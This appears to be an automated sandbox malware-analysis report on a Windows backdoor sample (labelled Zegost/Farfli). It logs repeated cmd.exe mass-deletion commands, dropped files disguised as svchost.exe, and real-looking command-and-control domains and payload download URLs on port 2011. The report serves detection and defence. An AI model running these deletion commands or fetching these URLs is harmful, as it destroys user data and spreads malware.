                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exitJump to behavior
                Source: C:\Windows\Temp\ .exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exitJump to behavior
                Source: C:\Windows\SysWOW64\033726\svchost.exeProcess created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00401680 AllocateAndInitializeSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeAcl,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,GetProcessHeap,GetProcessHeap,HeapFree,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,FreeSid,5_2_00401680
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00401680 AllocateAndInitializeSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeAcl,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,GetProcessHeap,GetProcessHeap,HeapFree,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,FreeSid,5_2_00401680
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10025DC0 cpuid 3_2_10025DC0
                Source: C:\Windows\Temp\ .exeCode function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,5_2_0045F814
                Source: C:\Windows\Temp\ .exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,5_2_00401060
                Source: C:\Windows\Temp\ .exeCode function: GetLocaleInfoA,5_2_00451400
                Source: C:\Windows\Temp\ .exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                Source: C:\Windows\Temp\ .exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_00402AD0 LoadLibraryA,LoadLibraryA,6D0C6DE0,6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,memset,lstrcmp,sprintf,sprintf,sprintf,Sleep,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep,2_2_00402AD0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10007070 LookupAccountNameA,IsValidSid,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary,3_2_10007070
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00433020 SendMessageA,SendMessageA,RegQueryValueExA,SystemTimeToVariantTime,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetTimeZoneInformation,SendMessageA,SendMessageA,SendMessageA,SendMessageA,RegOpenKeyExA,SendMessageA,SendMessageA,5_2_00433020
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_004059FF
                Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
                Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
                Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                121
                Input Capture
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                21
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts12
                Native API
                13
                Windows Service
                1
                Access Token Manipulation
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop Protocol121
                Input Capture
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter
                1
                Registry Run Keys / Startup Folder
                13
                Windows Service
                21
                Obfuscated Files or Information
                Security Account Manager1
                System Service Discovery
                SMB/Windows Admin Shares3
                Clipboard Data
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts12
                Service Execution
                Login Hook12
                Process Injection
                1
                Software Packing
                NTDS4
                File and Directory Discovery
                Distributed Component Object ModelInput Capture1
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                Registry Run Keys / Startup Folder
                1
                DLL Side-Loading
                LSA Secrets65
                System Information Discovery
                SSHKeylogging1
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                File Deletion
                Cached Domain Credentials1
                Network Share Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                Masquerading
                DCSync351
                Security Software Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
                Virtualization/Sandbox Evasion
                Proc Filesystem231
                Virtualization/Sandbox Evasion
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation
                /etc/passwd and /etc/shadow12
                Process Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                Process Injection
                Network Sniffing11
                Application Window Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                Indicator Removal
                Input Capture1
                System Owner/User Discovery
                Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled TaskEmbedded PayloadsKeylogging1
                Remote System Discovery
                Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd TimersCommand ObfuscationGUI Input Capture1
                System Network Configuration Discovery
                Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579781 Sample: G3izWAY3Fa.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 84 80 www.wk1888.com 2->80 82 www.fz0575.com 2->82 84 2 other IPs or domains 2->84 94 Suricata IDS alerts for network traffic 2->94 96 Malicious sample detected (through community Yara rule) 2->96 98 Antivirus detection for dropped file 2->98 100 10 other signatures 2->100 9 G3izWAY3Fa.exe 8 2->9         started        13 svchsot.exe 2->13         started        15 v5.exe 2->15         started        18 svchsot.exe 2->18         started        signatures3 process4 dnsIp5 68 C:\Windows\Temp\v5.exe, PE32 9->68 dropped 70 C:\Windows\Temp\server.exe, PE32 9->70 dropped 72 C:\Windows\Temp\            .exe, PE32 9->72 dropped 116 Drops executables to the windows directory (C:\Windows) and starts them 9->116 20 server.exe 1 22 9->20         started        25 v5.exe 1 9->25         started        27            .exe 19 9->27         started        118 Antivirus detection for dropped file 13->118 120 Multi AV Scanner detection for dropped file 13->120 122 Machine Learning detection for dropped file 13->122 88 chinagov.8800.org 8.7.198.46, 49720, 49774, 49820 SPRINGSUS United States 15->88 90 46.82.174.69, 49865, 49912, 49956 DTAGInternetserviceprovideroperationsDE Germany 15->90 92 192.168.2.1, 80 unknown unknown 15->92 file6 signatures7 process8 dnsIp9 86 120.48.34.233, 49707, 49713, 49767 CHINANET-BACKBONENo31Jin-rongStreetCN China 20->86 62 C:\Windows\XXXXXX05CA35CC\svchsot.exe, PE32 20->62 dropped 64 C:\Windows\SysWOW64\033726\svchost.exe, PE32 20->64 dropped 66 C:\Windows\SysWOW64\033726\RCX773C.tmp, PE32 20->66 dropped 102 Antivirus detection for dropped file 20->102 104 Multi AV Scanner detection for dropped file 20->104 106 Machine Learning detection for dropped file 20->106 114 7 other signatures 20->114 29 svchost.exe 20->29         started        108 Contains functionality to enumerate network shares of other devices 25->108 110 Found evasive API chain (may stop execution after checking mutex) 25->110 112 Deletes itself after installation 25->112 33 cmd.exe 25->33         started        35 cmd.exe 27->35         started        37 cmd.exe 27->37         started        39 cmd.exe 27->39         started        41 29 other processes 27->41 file10 signatures11 process12 file13 74 C:\Windows\...\svchsot.exe, PE32 29->74 dropped 76 C:\Windows\SysWOW64\034031\svchost.exe, PE32 29->76 dropped 78 C:\Windows\SysWOW64\034031\RCX8B31.tmp, PE32 29->78 dropped 128 Antivirus detection for dropped file 29->128 130 Multi AV Scanner detection for dropped file 29->130 132 Machine Learning detection for dropped file 29->132 134 5 other signatures 29->134 43 svchost.exe 29->43         started        46 conhost.exe 33->46         started        48 conhost.exe 35->48         started        50 conhost.exe 37->50         started        52 conhost.exe 39->52         started        54 conhost.exe 41->54         started        56 conhost.exe 41->56         started        58 conhost.exe 41->58         started        60 26 other processes 41->60 signatures14 process15 signatures16 124 Antivirus detection for dropped file 43->124 126 Machine Learning detection for dropped file 43->126

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                G3izWAY3Fa.exe70%VirustotalBrowse
                G3izWAY3Fa.exe87%ReversingLabsWin32.Backdoor.Zegost
                G3izWAY3Fa.exe100%AviraHEUR/AGEN.1337945
                SourceDetectionScannerLabelLink
                C:\Windows\SysWOW64\033726\svchost.exe100%AviraBDS/Zegost.birna
                C:\Windows\SysWOW64\034031\svchost.exe100%AviraBDS/Zegost.birna
                C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe100%AviraBDS/Zegost.birna
                C:\Windows\XXXXXX05CA35CC\svchsot.exe100%AviraBDS/Zegost.birna
                C:\Windows\SysWOW64\033726\RCX773C.tmp100%AviraBDS/Zegost.birna
                C:\Windows\Temp\server.exe100%AviraBDS/Zegost.birna
                C:\Windows\Temp\v5.exe100%AviraTR/Staser.apzjs
                C:\Windows\SysWOW64\034031\RCX8B31.tmp100%AviraBDS/Zegost.birna
                C:\Windows\SysWOW64\033726\svchost.exe100%Joe Sandbox ML
                C:\Windows\SysWOW64\034031\svchost.exe100%Joe Sandbox ML
                C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe100%Joe Sandbox ML
                C:\Windows\XXXXXX05CA35CC\svchsot.exe100%Joe Sandbox ML
                C:\Windows\SysWOW64\033726\RCX773C.tmp100%Joe Sandbox ML
                C:\Windows\Temp\server.exe100%Joe Sandbox ML
                C:\Windows\Temp\v5.exe100%Joe Sandbox ML
                C:\Windows\SysWOW64\034031\RCX8B31.tmp100%Joe Sandbox ML
                C:\Windows\SysWOW64\033726\svchost.exe95%ReversingLabsWin32.Backdoor.Farfli
                C:\Windows\Temp\ .exe4%ReversingLabs
                C:\Windows\Temp\server.exe95%ReversingLabsWin32.Backdoor.Farfli
                C:\Windows\Temp\v5.exe100%ReversingLabsWin32.Trojan.MintZard
                C:\Windows\XXXXXX05CA35CC\svchsot.exe95%ReversingLabsWin32.Backdoor.Farfli
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                chinagov.8800.org
                8.7.198.46
                truetrue
                  unknown
                  www.af0575.com
                  unknown
                  unknowntrue
                    unknown
                    www.wk1888.com
                    unknown
                    unknowntrue
                      unknown
                      www.fz0575.com
                      unknown
                      unknowntrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.af0575.com:2011/1.exe8server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://www.wk1888.com:2011/1.exersvchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://www.af0575.com:2011/1.exeserver.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://www.af0575.com:2011/1.exersvchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://www.fz0575.com:2011/1.exeserver.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://www.wk1888.com/server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.af0575.com:2011/1.exee3svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://www.af0575.com:2011/1.exe~lserver.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGY .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://192.168.2.1v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://192.168.2.1:80/_v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              http://192.168.2.1:80/6to4v5.exe, 00000004.00000003.1561640538.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://192.168.2.1/1v5.exe, 00000004.00000003.1494703239.00000000006B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.af0575.com:2011/1.exeesvchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://deff.nelreports.net/api/report?cat=msn .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://nsis.sf.net/NSIS_ErrorErrorG3izWAY3Fa.exefalse
                                                        high
                                                        http://www.af0575.com:2011/1.exebsvchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://www.fz0575.com:2011/1.exewserver.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://192.168.2.1:80/v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              http://nsis.sf.net/NSIS_ErrorG3izWAY3Fa.exefalse
                                                                high
                                                                http://192.168.2.1/VZv5.exe, 00000004.00000003.2237287822.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2013456576.0000000000691000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  http://192.168.2.1/hv5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://www.fz0575.com:2011/1.exersvchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://192.168.2.1/v5.exe, 00000004.00000003.2558799404.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006B3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://www.wk1888.com:2011/1.exesvchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          http://www.fz0575.com:2011/1.exe-server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://www.fz0575.com:2011/1.exelo~server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://www.af0575.com:2011/1.exejltserver.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://192.168.2.1:80/~v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://www.wk1888.com:2011/1.exetlVserver.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
